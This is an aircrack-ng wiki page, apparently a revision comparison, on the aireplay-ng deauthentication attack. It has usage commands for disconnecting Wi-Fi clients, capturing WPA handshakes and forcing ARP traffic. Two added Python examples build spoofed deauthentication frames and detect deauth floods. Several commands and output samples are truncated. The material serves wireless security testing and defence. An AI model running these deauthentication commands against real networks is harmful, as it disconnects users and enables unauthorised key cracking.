Revisions compared: 2006/11/19 16:12 (darkaudax) and 2010/11/21 13:34 (sleek, "typos")
====== Deauthentication ======
===== Description =====
This attack sends deauthentication packets to one or more clients which are currently associated with a particular access point. It is used for:
  * Recovering a hidden ESSID. This is an ESSID which is not being broadcast.
  * Capturing WPA/WPA2 handshakes by forcing clients to reauthenticate
  * Generating ARP requests (Windows clients sometimes flush their ARP cache when disconnected)
Of course, this attack is totally useless if there are no associated wireless clients, or against a fake authentication (there is no real client behind it to disconnect).
===== Usage =====

  aireplay-ng -0 1 -a <AP MAC> -c <client MAC> ath0

Where:
  * -0 means deauthentication
  * 1 is the number of deauths to send (you can send multiple if you wish); 0 means send them continuously
  * -a is the MAC address of the access point (the BSSID)
  * -c is the MAC address of the client to deauthenticate; if -c is omitted, the deauthentication is sent to the broadcast address
  * ath0 is the interface name
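As an added example that is not part of the aircrack-ng wiki, here is what the frames behind -0 look like, built and decoded in Python: the 802.11 deauthentication frame, the AP-to-client and client-to-AP pair that one round of a directed (-c) run sends, and the broadcast variant sent when -c is omitted. The AP and client MACs are the ones from the WPA handshake example on this page; the duration value, the sequence numbers and the choice of reason code 7 are assumptions of this example. Nothing is transmitted; the frames are only constructed as bytes.

```python
import struct

# Addresses: AP and client MACs are the ones used in this page's WPA handshake
# example; the broadcast address is the 802.11 group address.
AP_MAC = "00:14:6C:7E:40:80"
CLIENT_MAC = "00:0F:B5:AB:CB:9D"
BROADCAST_MAC = "ff:ff:ff:ff:ff:ff"

# Frame Control byte 0: protocol version 0, type 0 (management), subtype 12
# (deauthentication) -> 0b1100_0000. Byte 1 carries the flags (none set here).
FC_DEAUTH = 0xC0
MGMT_TYPE = 0
DEAUTH_SUBTYPE = 12
# Reason code chosen for this example (assumption): 7 = class 3 frame received
# from a non-associated station. Any valid code disconnects the client.
REASON_CLASS3_FRAME = 7
HEADER_FMT = "<BBH6s6s6sH"  # fc0, fc1, duration, addr1, addr2, addr3, seq ctrl
HEADER_LEN = struct.calcsize(HEADER_FMT)  # 24 bytes


def mac_to_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def bytes_to_mac(raw):
    return ":".join("%02x" % b for b in raw)


def build_deauth(dst, src, bssid, seq=0, reason=REASON_CLASS3_FRAME):
    """Return a raw deauthentication frame: 24-byte management header plus
    the 2-byte reason code body. No FCS; the driver appends it on injection."""
    header = struct.pack(
        HEADER_FMT,
        FC_DEAUTH,
        0x00,
        0x013A,                 # duration/ID (assumed value for this example)
        mac_to_bytes(dst),      # addr1: receiver address
        mac_to_bytes(src),      # addr2: transmitter address (spoofed)
        mac_to_bytes(bssid),    # addr3: BSSID of the network
        (seq & 0x0FFF) << 4,    # sequence control: 12-bit sequence number, fragment 0
    )
    return header + struct.pack("<H", reason)


def parse_deauth(frame):
    """Decode a deauthentication frame; raise ValueError for anything else."""
    if len(frame) < HEADER_LEN + 2:
        raise ValueError("frame too short for a deauthentication frame")
    fc0, _fc1, _dur, a1, a2, a3, seqctl = struct.unpack(HEADER_FMT, frame[:HEADER_LEN])
    ftype, subtype = (fc0 >> 2) & 0x3, (fc0 >> 4) & 0xF
    if (ftype, subtype) != (MGMT_TYPE, DEAUTH_SUBTYPE):
        raise ValueError("not a deauthentication frame: type=%d subtype=%d" % (ftype, subtype))
    (reason,) = struct.unpack("<H", frame[HEADER_LEN:HEADER_LEN + 2])
    return {
        "dst": bytes_to_mac(a1),
        "src": bytes_to_mac(a2),
        "bssid": bytes_to_mac(a3),
        "seq": seqctl >> 4,
        "reason": reason,
        "broadcast": a1 == b"\xff" * 6,
    }


def directed_deauth_pair(ap, client, seq=0):
    """The two frames one round of a directed (-c) deauthentication sends:
    one to the client pretending to be the AP, one to the AP pretending to be
    the client. Each unicast frame is ACKed by its receiver, which is what the
    "[ client ACKs | AP ACKs ]" counters in the aireplay-ng output report."""
    to_client = build_deauth(client, ap, ap, seq)
    to_ap = build_deauth(ap, client, ap, seq)
    return to_client, to_ap


def broadcast_deauth(ap, seq=0):
    """The frame sent when -c is omitted: an AP-spoofed deauth to the group
    address. Many drivers and firmware ignore it, which is why -c is preferred."""
    return build_deauth(BROADCAST_MAC, ap, ap, seq)


if __name__ == "__main__":
    frames = directed_deauth_pair(AP_MAC, CLIENT_MAC, seq=1) + (broadcast_deauth(AP_MAC),)
    for frame in frames:
        print(frame.hex(), parse_deauth(frame))
```

The decoder is strict about type/subtype so that a beacon or data frame handed to it is rejected rather than silently misread; that is the same check a capture filter needs before counting deauths.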
===== Usage Examples =====

==== Typical Deauthentication ====
First, you determine a client which is currently connected.

  aireplay-ng -0 1 -a <AP MAC> -c <client MAC> ath0

Where:
  * -0 means deauthentication
  * 1 is the number of deauths to send (you can send multiple if you wish)
  * -a is the MAC address of the access point
  * -c is the MAC address of the client to deauthenticate
  * ath0 is the interface name

Here is typical output:

For directed deauthentications,

Here is what the "[ 61|63 ACKs]" means:

  * [ ACKs received from the client | ACKs received from the AP ]
  * You will notice that the numbers in the example above are lower than 64, which is the number of packets sent in each direction. It is not unusual to lose a few packets.
  * How do you use this information?
==== WPA/WPA2 Handshake capture with an Atheros ====
  airmon-ng start ath0
  airodump-ng
  aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0
  (wait for a few seconds)
  aircrack-ng -w /
Explanation of the above:

  airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w out ath0
Where:
  * -c 6 is the channel to listen on
  * --bssid 00:14:6C:7E:40:80 is the MAC address of the access point; this limits the capture to that AP
  * -w out is the file prefix of the file name to be written
  * ath0 is the interface name

  aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0
Where:
  * -0 means deauthentication attack
  * 5 is the number of groups of deauthentication packets to send out
  * -a 00:14:6C:7E:40:80 is the MAC address of the access point
  * -c 00:0F:B5:AB:CB:9D is the MAC address of the client to deauthenticate
  * ath0 is the interface name

Here is what the output looks like from "
==== ARP request generation with a Prism2 card ====
  airmon-ng start wlan0
  airodump-ng
  aireplay-ng -0 10 -a 00:
  aireplay-ng -3 -b 00:
After sending the ten batches of deauthentication packets, we start listening for ARP requests with attack 3. The -h option is mandatory and has to be the MAC address of an associated client.
If the driver is [[http://
===== Usage Tips =====

It is usually more effective to target a specific station using the -c parameter.

The deauthentication packets are sent directly from your PC to the clients.
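The flip side of the usage tips above, as an added example that is not part of the aircrack-ng wiki: detection logic a defender would run over captured management frames to spot a deauthentication flood and to tell a directed (-c) run, which produces frames in both directions, from a broadcast one. The frames are a constructed sample embedded in the code; the AP and client MACs come from the WPA example on this page, while the second AP, the other client, the timings and the alert threshold are assumptions.

```python
from collections import defaultdict

BROADCAST = "ff:ff:ff:ff:ff:ff"
DEAUTH, DISASSOC, ASSOC_REQ, BEACON = 12, 10, 0, 8  # 802.11 management subtypes

# Constructed sample capture, as (timestamp_s, subtype, addr1/receiver,
# addr2/transmitter, addr3/BSSID). The AP and client MACs are the ones from
# this page's WPA handshake example; the second AP, the other client, the
# timings and the counts are made up for this example.
AP = "00:14:6c:7e:40:80"
CLIENT = "00:0f:b5:ab:cb:9d"
OTHER_CLIENT = "00:11:22:33:44:55"   # assumed
AP2 = "00:12:34:56:78:9a"            # assumed

SAMPLE_FRAMES = [(10.00, BEACON, BROADCAST, AP, AP)]
# One directed round (aireplay-ng -0 1 with -c): 64 frames AP->client plus
# 64 frames client->AP, spread over about a third of a second.
for i in range(64):
    t = 10.10 + i * 0.005
    SAMPLE_FRAMES.append((t, DEAUTH, CLIENT, AP, AP))
    SAMPLE_FRAMES.append((t, DEAUTH, AP, CLIENT, AP))
SAMPLE_FRAMES.append((10.60, ASSOC_REQ, AP, CLIENT, AP))     # client re-associates
SAMPLE_FRAMES.append((30.00, DEAUTH, OTHER_CLIENT, AP, AP))  # one legitimate deauth
# A broadcast flood against a second AP (what -0 0 without -c looks like).
for i in range(20):
    SAMPLE_FRAMES.append((50.0 + i * 0.01, DEAUTH, BROADCAST, AP2, AP2))


def detect_deauth_floods(frames, window_s=1.0, threshold=10):
    """Alert once per BSSID whose deauth/disassoc frames reach `threshold`
    inside any sliding window of `window_s` seconds. The alert records whether
    broadcast frames were used, which clients were targeted, and how many
    frames were spoofed *from* a client towards the AP (directed aireplay-ng
    runs send both directions, so a real AP deauthenticating a client does
    not produce such frames)."""
    by_bssid = defaultdict(list)
    for ts, subtype, dst, src, bssid in frames:
        if subtype in (DEAUTH, DISASSOC):
            by_bssid[bssid].append((ts, dst, src))

    alerts = []
    for bssid, events in by_bssid.items():
        events.sort()
        best, start = None, 0
        for end in range(len(events)):
            # Shrink the window from the left until it spans at most window_s.
            while events[end][0] - events[start][0] > window_s:
                start += 1
            count = end - start + 1
            if count >= threshold and (best is None or count > best[0]):
                best = (count, start, end)
        if best is None:
            continue
        count, s, e = best
        window = events[s:e + 1]
        alerts.append({
            "bssid": bssid,
            "count": count,
            "window": (window[0][0], window[-1][0]),
            "broadcast": any(dst == BROADCAST for _, dst, _ in window),
            "targets": sorted({dst for _, dst, _ in window if dst not in (BROADCAST, bssid)}),
            "spoofed_client_frames": sum(1 for _, dst, _ in window if dst == bssid),
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_deauth_floods(SAMPLE_FRAMES):
        print(alert)
```

The single legitimate deauth at t=30 never trips the threshold, the directed run is reported with the targeted client and 64 client-spoofed frames, and the broadcast run is reported with no targets at all; the same three signals (rate, direction, broadcast vs unicast) are what a wireless IDS keys on.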
===== Usage Troubleshooting =====

==== Why does deauthentication not work? ====

There can be several reasons, and one or more can affect you:

  * You are physically too far away from the client(s).
  * Wireless cards work in particular modes such as b, g, n and so on. If your card is in a different mode than the client card, there is a good chance that the client will not be able to correctly receive your transmission.
  * Some clients ignore broadcast deauthentications.
  * Clients may reconnect too fast for you to see that they had been disconnected.
==== General ====

See the general aireplay-ng troubleshooting ideas: [[aireplay-ng#

With a count of 0 the attack loops forever; run without -c it sends the deauthentication packets to the broadcast address, which prevents clients from staying connected. Sadly, the most up-to-date drivers and firmware ignore deauthentications sent to the broadcast address, so you need to send them directly to each client using the -c option as described above.
deauthentication.1163949138.txt.gz · Last modified: 2007/01/26 19:19 (external edit)